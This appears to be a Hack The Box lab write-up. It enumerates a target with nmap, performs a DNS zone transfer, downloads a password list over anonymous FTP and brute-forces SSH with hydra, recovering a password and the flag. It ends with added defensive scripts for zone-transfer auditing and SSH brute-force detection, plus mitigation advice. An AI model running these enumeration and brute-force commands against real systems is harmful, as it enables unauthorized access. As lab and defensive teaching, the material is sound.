Scope of work
The second server is an internal server storing emails and files as a backup. The server isn't used often, and when it is, it's mainly for testing purposes. The IP of the server is 10.129.90.235
Information Gathering
Since I only have one target, I create an IP variable in .zshrc and run a full Nmap scan of the target:
nmap -Pn -sS -sV -sC -p- $IP -oA med.scan -v
--Snip--
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
110/tcp open pop3 Dovecot pop3d
995/tcp open ssl/pop3 Dovecot pop3d
2121/tcp open ftp ProFTPD
30021/tcp open unknown
--Snip--
Port 53 being open tells me this is a DNS server, and I was able to perform a successful DNS zone transfer.
dig axfr inlanefreight.htb @$IP
; <<>> DiG 9.20.22-1-Debian <<>> axfr inlanefreight.htb @10.129.90.235
;; global options: +cmd
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.
app.inlanefreight.htb. 604800 IN A 10.129.200.5
dc1.inlanefreight.htb. 604800 IN A 10.129.100.10
dc2.inlanefreight.htb. 604800 IN A 10.129.200.10
int-ftp.inlanefreight.htb. 604800 IN A 127.0.0.1
int-nfs.inlanefreight.htb. 604800 IN A 10.129.200.70
ns.inlanefreight.htb. 604800 IN A 127.0.0.1
un.inlanefreight.htb. 604800 IN A 10.129.200.142
ws1.inlanefreight.htb. 604800 IN A 10.129.200.101
ws2.inlanefreight.htb. 604800 IN A 10.129.200.102
wsus.inlanefreight.htb. 604800 IN A 10.129.200.80
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
;; Query time: 239 msec
;; SERVER: 10.129.90.235#53(10.129.90.235) (TCP)
;; WHEN: Tue May 05 12:13:27 EDT 2026
;; XFR size: 13 records (messages 1, bytes 372)
The int-ftp record points at a loopback address, which indicates an internal name record for a service running on the DNS server itself, so I added 10.129.90.235 int-ftp.inlanefreight.htb to /etc/hosts.
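The same reasoning can be applied mechanically to a whole transfer. The following script is an added example (not part of the original write-up): it parses dig's axfr output into records, classifies every A record's target as loopback, private or public, and substitutes the queried server's address for loopback targets, which is exactly the manual /etc/hosts fix above. From the defensive side, the "loopback-on-nameserver" category is the list of internal services a zone transfer would leak if AXFR is left open. The sample input is a subset of the transfer shown above; the function and category names are my own.

```python
import ipaddress
import re

# Sample input: a subset of the zone transfer shown above, laid out the way
# dig prints it (name TTL class type rdata). Comment lines (";") and blank
# lines are skipped by the parser.
SAMPLE_AXFR = """\
; <<>> DiG 9.20.22-1-Debian <<>> axfr inlanefreight.htb @10.129.90.235
;; global options: +cmd
inlanefreight.htb.         604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb.         604800 IN NS  ns.inlanefreight.htb.
app.inlanefreight.htb.     604800 IN A   10.129.200.5
int-ftp.inlanefreight.htb. 604800 IN A   127.0.0.1
ns.inlanefreight.htb.      604800 IN A   127.0.0.1
ws1.inlanefreight.htb.     604800 IN A   10.129.200.101
inlanefreight.htb.         604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
;; Query time: 239 msec
"""

# One resource record per line: owner name, TTL, class IN, type, rdata.
RECORD_RE = re.compile(
    r"^(?P<name>\S+)\s+(?P<ttl>\d+)\s+IN\s+(?P<rtype>[A-Z]+)\s+(?P<rdata>.+)$"
)


def parse_axfr(text):
    """Return (name, type, rdata) tuples for every record line in dig axfr output."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RECORD_RE.match(line)
        if m:
            records.append(
                (m.group("name").rstrip("."), m.group("rtype"), m.group("rdata").strip())
            )
    return records


def audit_a_records(records, server_ip):
    """Classify the target address of each A record.

    Returns {name: (effective_ip, category)}. A loopback target means the
    host lives on the name server itself, so its effective address becomes
    server_ip (the address the zone was transferred from).
    """
    result = {}
    for name, rtype, rdata in records:
        if rtype != "A":
            continue
        try:
            addr = ipaddress.ip_address(rdata)
        except ValueError:
            result[name] = (rdata, "unparseable")
            continue
        if addr.is_loopback:  # check loopback first: 127/8 is also "private"
            result[name] = (server_ip, "loopback-on-nameserver")
        elif addr.is_private:
            result[name] = (rdata, "private")
        else:
            result[name] = (rdata, "public")
    return result


def hosts_lines(audit):
    """Render /etc/hosts lines for every A record using the effective address."""
    return sorted(f"{ip} {name}" for name, (ip, _) in audit.items())


if __name__ == "__main__":
    recs = parse_axfr(SAMPLE_AXFR)
    audit = audit_a_records(recs, "10.129.90.235")
    for name, (ip, cat) in sorted(audit.items()):
        print(f"{name:28} {ip:16} {cat}")
    print("\n".join(hosts_lines(audit)))
```

Run against a real transfer, the "loopback-on-nameserver" entries are the ones worth checking on the server itself, and the same output doubles as an inventory of what an open AXFR hands to anyone who asks.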
I tried an anonymous login with ftp int-ftp.inlanefreight.htb 2121, but it failed. Next I tried ftp int-ftp.inlanefreight.htb 30021 and was able to get in.
With access to the FTP server, I started looking around. The ls command returned a directory called "simon." I copied the file called "mynotes.txt" and closed the FTP connection.
ftp> ls
229 Entering Extended Passive Mode (|||4946|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 ftp ftp 4096 Apr 18 2022 simon
226 Transfer complete
ftp> cd simon
250 CWD command successful
ftp> ls
229 Entering Extended Passive Mode (|||8376|)
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 ftp ftp 153 Apr 18 2022 mynotes.txt
226 Transfer complete
ftp> get mynotes.txt
local: mynotes.txt remote: mynotes.txt
229 Entering Extended Passive Mode (|||39343|)
150 Opening BINARY mode data connection for mynotes.txt (153 bytes)
100% |***********************************************************************| 153 2.99 KiB/s 00:00 ETA
226 Transfer complete
153 bytes received in 00:00 (0.49 KiB/s)
When I read the text file, it appeared to be a list of passwords.
cat mynotes.txt
234987123948729384293
+23358093845098
ThatsMyBigDog
Rock!ng#May
Puuuuuh7823328
8Ns8j1b!23hs4921smHzwn
237oHs71ohls18H127!!9skaP
238u1xjn1923nZGSb261Bs81
Exploitation
Using Hydra, I was able to brute-force Simon's SSH password.
hydra -l simon -P mynotes.txt ssh://$IP
--SNIP--
[22][ssh] host: 10.129.90.235 login: simon password: 8Ns8j1b!23hs4921smHzwn
--SNIP--
With a username and password, I was able to log in to the server as Simon and retrieve the flag.
ssh simon@$IP
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
simon@10.129.90.235's password:
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-107-generic x86_64)
--SNIP--
simon@lin-medium:~$ ls
flag.txt Maildir
simon@lin-medium:~$ cat flag.txt
HTB{1qay2wsx3EDC4rfv_M3D1UM}
Mitigation Recommendations
- Disable anonymous FTP login - Anyone with access to the server can log in and download/upload files. This can allow attackers to upload a reverse shell or download sensitive data
- Don't keep sensitive data on a shared file system - A list of usernames, passwords, hashes, or anything else an attacker can use to log in with is a gold mine. If maintaining sensitive data on a shared drive is required, ensure it's encrypted and utilize access controls.
- Login attempts - Limit how many times a wrong password can be entered on an account. This wouldn't have stopped the Hydra scan, but it could have slowed it down.
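A lockout limit slows the attack; logging is what makes it visible. As an added example (not from the write-up or the target), the script below runs the detection a defender would want for the Hydra result above and for this last recommendation: it parses sshd "Failed password" / "Accepted password" lines from auth.log, flags any source that produces a burst of failures inside a short sliding window, and raises a second alert when a flagged source then succeeds, which is the signature a wordlist attack leaves behind. The log excerpt is constructed, the year is assumed because syslog timestamps omit it, and the thresholds and function names are my own.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt in the syslog layout sshd uses on Ubuntu 20.04.
# Source 10.10.14.7 fails five times in two seconds and then succeeds;
# 192.168.1.20 fails twice, fifteen minutes apart (ordinary typos).
SAMPLE_AUTH_LOG = """\
May  5 12:20:01 lin-medium sshd[2101]: Failed password for simon from 10.10.14.7 port 50012 ssh2
May  5 12:20:01 lin-medium sshd[2103]: Failed password for simon from 10.10.14.7 port 50014 ssh2
May  5 12:20:02 lin-medium sshd[2105]: Failed password for simon from 10.10.14.7 port 50016 ssh2
May  5 12:20:02 lin-medium sshd[2107]: Failed password for simon from 10.10.14.7 port 50018 ssh2
May  5 12:20:03 lin-medium sshd[2109]: Failed password for simon from 10.10.14.7 port 50020 ssh2
May  5 12:20:03 lin-medium sshd[2111]: Accepted password for simon from 10.10.14.7 port 50022 ssh2
May  5 12:25:40 lin-medium sshd[2150]: Failed password for admin from 192.168.1.20 port 41000 ssh2
May  5 12:40:00 lin-medium sshd[2160]: Failed password for admin from 192.168.1.20 port 41002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def parse_auth_log(text, year=2026):
    """Return (timestamp, source_ip, user, result) for each sshd password event.

    The year is an assumption: syslog timestamps do not carry one.
    """
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # other sshd/PAM noise is ignored
        ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
        events.append((ts, m.group("src"), m.group("user"), m.group("result")))
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Sliding-window detector over parsed events.

    Emits ("burst", src, user, ts) the first time a source reaches `threshold`
    failures within `window_seconds`, and ("success-after-burst", ...) when a
    source already flagged then logs in successfully. Ties on timestamp keep
    file order (stable sort), so a success logged after the fifth failure in
    the same second is still seen after it.
    """
    alerts = []
    recent = defaultdict(deque)  # src -> timestamps of failures still in window
    flagged = set()
    for ts, src, user, result in sorted(events, key=lambda e: e[0]):
        if result == "Failed":
            q = recent[src]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("burst", src, user, ts))
        elif result == "Accepted" and src in flagged:
            alerts.append(("success-after-burst", src, user, ts))
    return alerts


if __name__ == "__main__":
    for kind, src, user, ts in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)):
        print(f"{ts} {kind:20} src={src} user={user}")
```

The "success-after-burst" alert is the one to page on: a burst alone may be a misconfigured client, but a burst followed by a valid login from the same source means the password list worked. The same window logic applies unchanged to ProFTPD's login failures if you swap the regular expression.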
Lessons Learned
- Try a zone transfer if port 53 is open
- When a name record resolves to a loopback address, the service is local to the DNS server you queried (the @IP host), not to your own machine